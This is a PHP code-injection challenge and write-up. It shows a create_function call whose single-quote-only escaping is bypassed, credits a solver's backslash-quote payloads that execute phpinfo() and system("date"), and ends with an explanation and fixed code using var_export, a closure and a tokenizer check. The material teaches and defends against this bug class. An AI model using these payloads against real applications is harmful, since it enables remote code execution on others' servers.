Hi guys, Sebastian from @internetwache here.

I discovered the following PHP source code in a web application:

***
create_function('','return md5(\''.str_replace("'", "\\'", $arg).'\');');
***

$arg is a user-controlled parameter. Try to make an RCE out of it (no solution guaranteed)! If you have a solution, contact us at @internetwache.

Testbed for you:

***
cat /tmp/test.php
***

Use it like this:

***
> php /tmp/test.php "foo"
Payload: return md5('foo');
Exec: acbd18db4cc2f85cedef654fccc4a4d8
***

Have fun!

~ Sebastian

=========SOLUTION=========

First one to solve it was Jakub Żoczek (@zoczus):

- Payload: \'.phpinfo());}//
- Works on cmd-line and apache
- Screenshot: http://i.imgur.com/iis47XM.png

***
> php /tmp/test.php "\\'.system(\"date\"));}//"
Payload: return md5('\\'.system("date"));}//');
Exec: Mi 8. Okt 14:09:24 CEST 2014
e928add3e8dc71d4768ad85338b90309⏎
***

Well done!
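Why the escaping above fails and what a fixed version looks like, as an added example (not the challenge's test.php and not code from @internetwache): the `str_replace` quoting beside `var_export` quoting, a closure that needs no quoting at all, and a tokenizer check that flags a literal the input has broken out of. The helper names are assumed for this illustration.

```php
<?php
// Added illustration, not the challenge's test.php. The function names
// here (naive_quote, safe_quote, make_hasher, is_single_literal) are mine.

// The challenge's quoting: only the single quote is escaped. A backslash
// in the input passes through, so an input ending in "\" turns the added
// escaping backslash into "\\" and leaves the quote after it unescaped.
function naive_quote(string $arg): string {
    return "'" . str_replace("'", "\\'", $arg) . "'";
}

// A single-quoted PHP literal needs both "\" and "'" escaped;
// var_export() emits exactly that form.
function safe_quote(string $arg): string {
    return var_export($arg, true);
}

// Preferred fix: never assemble source text. A closure captures $arg as
// data, so no quoting step exists to get wrong (create_function itself
// was deprecated in PHP 7.2 and removed in PHP 8.0).
function make_hasher(string $arg): Closure {
    return function () use ($arg): string { return md5($arg); };
}

// Defensive check: tokenize the generated literal and require that it is
// one string constant. Anything else means the input escaped the quotes.
function is_single_literal(string $literal): bool {
    $kinds = [];
    foreach (token_get_all('<?php ' . $literal . ';') as $t) {
        $id = is_array($t) ? $t[0] : $t;
        if ($id === T_OPEN_TAG || $id === T_WHITESPACE) { continue; }
        $kinds[] = $id;
    }
    return $kinds === [T_CONSTANT_ENCAPSED_STRING, ';'];
}

// Constructed input: backslash followed by single quote, the two
// characters that open the payload from the solution above.
$input = "\\'";

$checks = [
    'naive quoting keeps input inside one literal'      => is_single_literal(naive_quote($input)),
    'var_export quoting keeps input inside one literal' => is_single_literal(safe_quote($input)),
    'safe literal round-trips to the original string'   => eval('return ' . safe_quote($input) . ';') === $input,
    'closure hashes the value with no quoting at all'   => make_hasher($input)() === md5($input),
];
foreach ($checks as $name => $ok) {
    printf("%-52s %s\n", $name, $ok ? 'yes' : 'no');
}
```

The first check reports "no" and the other three "yes", which is the whole bug in one line: a single-quote-only replacement cannot keep a trailing backslash from neutralising its own escape.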